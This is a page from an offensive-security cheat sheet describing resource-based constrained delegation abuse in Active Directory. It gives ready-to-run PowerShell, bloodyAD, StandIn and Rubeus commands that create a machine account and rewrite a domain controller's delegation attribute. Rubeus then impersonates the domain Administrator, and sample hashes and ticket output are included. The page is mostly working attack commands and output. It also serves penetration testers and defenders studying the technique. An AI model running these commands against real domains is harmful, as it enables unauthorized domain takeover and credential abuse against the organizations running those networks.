kerberos-delegation-rbcd.md (5701B)
1 --- 2 title: "Kerberos Delegation - Resource Based Constrained Delegation" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/kerberos-delegation-rbcd.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-delegation-rbcd.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Kerberos Delegation - Resource Based Constrained Delegation 12 13 Resource-based Constrained Delegation was introduced in Windows Server 2012. 14 15 > The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. <https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html> 16 17 1. Import **Powermad** and **Powerview** 18 19 ```powershell 20 PowerShell.exe -ExecutionPolicy Bypass 21 Import-Module .\powermad.ps1 22 Import-Module .\powerview.ps1 23 ``` 24 25 2. Get user SID 26 27 ```powershell 28 $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid 29 $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID} 30 $ACE 31 ConvertFrom-SID $ACE.SecurityIdentifier 32 33 # alternative (Windows/Linux) 34 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get writable --otype COMPUTER --detail | egrep -i 'distinguishedName|msds-allowedtoactonbehalfofotheridentity' 35 ``` 36 37 3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it 38 39 ```powershell 40 New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force) 41 42 # alternative (Windows/Linux) 43 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add computer swktest 'Weakest123*' 44 ``` 45 46 4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties 47 48 ```powershell 49 $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid 50 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" 51 $SDBytes = New-Object byte[] ($SD.BinaryLength) 52 $SD.GetBinaryForm($SDBytes, 0) 53 Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 54 $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity 55 $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 56 $Descriptor.DiscretionaryAcl 57 58 # alternative (Windows/Linux) 59 # use 'remove' instead of 'add' after exploit 60 bloodyAD --host 10.1.0.4 -u user -p 'totoTOTOtoto1234*' -d crash.lab add rbcd 'dc01-ww2$' 'swktest$' 61 ``` 62 63 ```ps1 64 # alternative 65 $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid 66 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 67 68 # alternative 69 StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND 70 ``` 71 72 5. Use Rubeus to get hash from password 73 74 ```powershell 75 Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan 76 [*] Input password : Weakest123* 77 [*] Input username : swktest$ 78 [*] Input domain : factory.lan 79 [*] Salt : FACTORY.LANswktest 80 [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD 81 [*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498 82 [*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 83 [*] des_cbc_md5 : BA297CFD07E62A5E 84 ``` 85 86 6. Impersonate domain admin using our newly created machine account 87 88 ```powershell 89 .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap 90 .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap 91 92 [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' 93 [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) 94 [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan' 95 [*] Sending S4U2proxy request 96 [+] S4U2proxy success! 97 [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan': 98 99 doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD 100 AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE 101 LmZhY3RvcnkubGFu 102 103 [*] Action: Import Ticket 104 [+] Ticket successfully imported! 105 ``` 106 107 ## References 108 109 * [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) 110 * [A Case Study in Wagging the Dog: Computer Takeover - Will Schroeder - Feb 28, 2019](https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783)